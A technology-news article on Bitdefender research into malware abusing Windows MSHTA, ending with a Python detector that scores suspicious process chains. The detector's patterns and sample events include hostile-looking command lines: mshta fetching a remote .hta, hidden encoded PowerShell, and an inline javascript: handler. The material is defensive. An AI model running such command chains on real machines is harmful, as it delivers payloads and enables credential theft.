IT Brief Australia - Technology news for CIOs & IT decision-makers
MSHTA abuse helps malware hide in Windows processes

Wed, 20th May 2026
Sean Mitchell, Publisher

Bitdefender has published research on the use of Microsoft's MSHTA utility in malware attacks, focusing on a legacy Windows tool that remains enabled by default.

Attackers are using MSHTA to run malicious scripts through Microsoft-signed processes, making the activity appear more like normal Windows behaviour. Bitdefender linked the tool to campaigns involving malware families including LummaStealer, Amatera, CountLoader, Emmenhtal Loader, ClipBanker and PurpleFox.

MSHTA is a long-standing Windows utility tied to HTML Applications and Internet Explorer-era technology. Although Internet Explorer has been retired, the tool remains present on Windows systems, making it useful for cybercriminals seeking to avoid obvious malware binaries and instead abuse trusted software already installed on a machine.

Bitdefender has seen a rise in MSHTA-related detections in recent months. The report described this as part of a broader shift towards so-called living-off-the-land methods, in which attackers rely on legitimate administrative and scripting tools rather than custom executables that are more likely to trigger alarms.

In the campaigns Bitdefender reviewed, social engineering was a common entry point. Users were lured through fake software downloads, phishing links, Discord messages, ClickFix-style prompts, search-engine manipulation and fake human verification pages that encouraged them to copy and run malicious commands.

Some lures presented malware as cracked software, free applications or verification tools. Once a victim launched the process, MSHTA could retrieve further payloads from remote locations and execute them through multi-stage chains using HTA scripts, PowerShell and in-memory techniques.

This approach can make attacks harder to spot because fewer files are written to disk. Some malicious content was executed directly in memory, which can complicate analysis and reduce visibility for security monitoring tools.

The activity Bitdefender tracked ranged from credential theft to longer-term compromise of infected devices. Targets included browser-stored credentials, session cookies, cryptocurrency wallet data and financial information, while some operations also sought persistence and remote control of systems.

Legacy risk

The findings add to wider concern in the security industry about older Windows components that remain available after the products they were designed to support have been withdrawn. In this case, researchers argued that the continued presence of MSHTA leaves an opening for threat actors seeking to hide malicious actions inside ordinary operating system processes.

Australian organisations have faced persistent cyber risks linked to phishing, malvertising, credential theft and infostealer campaigns. The methods described in the report reflect those broader trends, particularly the use of deceptive websites and prompts that rely on user action rather than software exploits alone.

Security researchers have warned for several years that trusted native tools can give attackers an advantage because their presence is expected in many environments. When a threat actor uses a Windows component that administrators and software rely on for routine tasks, distinguishing hostile behaviour from legitimate activity becomes more difficult.

Mitigation steps

Organisations should consider restricting or disabling legacy scripting tools such as mshta.exe where possible, Bitdefender said. It also recommended moving older administrative scripts to modern alternatives and taking extra care with downloads, verification prompts and software obtained from untrusted sources.

The report comes as defenders continue to focus on attack chains that blend phishing, social engineering and native system tools. Rather than relying on a single malicious file, these campaigns increasingly spread execution across several stages, with each step designed to appear less suspicious than a conventional malware dropper.

For security teams, the challenge is not only detecting a specific utility but also identifying unusual sequences of behaviour around it, including script execution, remote payload retrieval and memory-based activity. The research suggests that as long as legacy components remain active by default, they are likely to remain part of the malware delivery toolkit.
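The behaviour sequences the report describes (mshta.exe launched from a user-facing lure, a remote payload fetched over HTTP, a second-stage PowerShell child with in-memory execution flags) can be correlated from ordinary process-creation telemetry. The following is an added example written for this article, not Bitdefender's code: a small scorer over Sysmon-style process-creation records. The field names, the parent and child lists, the weights and the alert threshold are assumptions, and every event below is a constructed sample, not captured data.

```python
"""Added example (not from the Bitdefender report): score mshta.exe process
trees for the living-off-the-land sequence described in the article.
Event shape is Sysmon-like (pid, ppid, image basename, command line); the
field names and weights are assumptions chosen for illustration."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, lower-case
    cmdline: str

# Parents from which mshta.exe is rarely launched legitimately. explorer.exe
# is weighted low because it is also the parent of normal double-click launches.
LURE_PARENTS = {"chrome.exe": 2, "msedge.exe": 2, "firefox.exe": 2,
                "winword.exe": 2, "excel.exe": 2, "outlook.exe": 2,
                "explorer.exe": 1}
# Children that indicate a further stage after mshta.exe.
STAGE_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                  "wscript.exe", "cscript.exe"}

REMOTE_RE = re.compile(r"https?://", re.I)                 # remote payload fetch
INLINE_RE = re.compile(r"\b(javascript|vbscript):", re.I)  # script in command line
MEMORY_RE = re.compile(                                     # in-memory execution hints
    r"(-enc\w*\s|\biex\b|downloadstring|invoke-expression|frombase64string)", re.I)
ALERT_THRESHOLD = 3

def analyse(events):
    """Return {mshta_pid: (score, [reasons])} for every mshta.exe process."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = {}
    for e in events:
        if e.image != "mshta.exe":
            continue
        score, reasons = 0, []
        parent = by_pid.get(e.ppid)
        if parent and parent.image in LURE_PARENTS:
            score += LURE_PARENTS[parent.image]
            reasons.append(f"launched by {parent.image}")
        if REMOTE_RE.search(e.cmdline):
            score += 2
            reasons.append("remote payload retrieval")
        if INLINE_RE.search(e.cmdline):
            score += 2
            reasons.append("inline script in command line")
        for child in children.get(e.pid, []):
            if child.image in STAGE_CHILDREN:
                score += 2
                reasons.append(f"spawned {child.image}")
                if MEMORY_RE.search(child.cmdline):
                    score += 2
                    reasons.append("in-memory execution indicators in child")
        findings[e.pid] = (score, reasons)
    return findings

def alerts(events, threshold=ALERT_THRESHOLD):
    """PIDs of mshta.exe processes whose score reaches the threshold."""
    return sorted(pid for pid, (score, _) in analyse(events).items()
                  if score >= threshold)

# Constructed sample telemetry (hostnames and paths are placeholders).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "chrome.exe", '"chrome.exe"'),
    # fake verification page: browser -> mshta -> remote .hta -> PowerShell
    ProcEvent(300, 200, "mshta.exe", "mshta.exe https://cdn.example.invalid/verify.hta"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -nop -w hidden -enc QUJD"),
    # benign-looking: user double-clicks a locally installed .hta
    ProcEvent(500, 100, "mshta.exe", r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    # Office lure with an inline script protocol handler
    ProcEvent(600, 100, "winword.exe", '"winword.exe" invoice.docx'),
    ProcEvent(700, 600, "mshta.exe", "mshta.exe javascript:close()"),
]

if __name__ == "__main__":
    for pid, (score, reasons) in analyse(SAMPLE_EVENTS).items():
        flag = "ALERT" if score >= ALERT_THRESHOLD else "ok"
        print(f"{flag:5} pid={pid} score={score} {reasons}")
```

On the constructed sample the browser-launched chain scores well above the threshold, the Office-launched inline script is flagged, and the locally installed .hta launched from explorer.exe stays below it: a single weak signal is not an alert, the sequence is. In a real deployment the lists and weights would be tuned against the environment's own baseline of mshta.exe usage.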

Many of the attacks Bitdefender observed were designed "to minimise detection".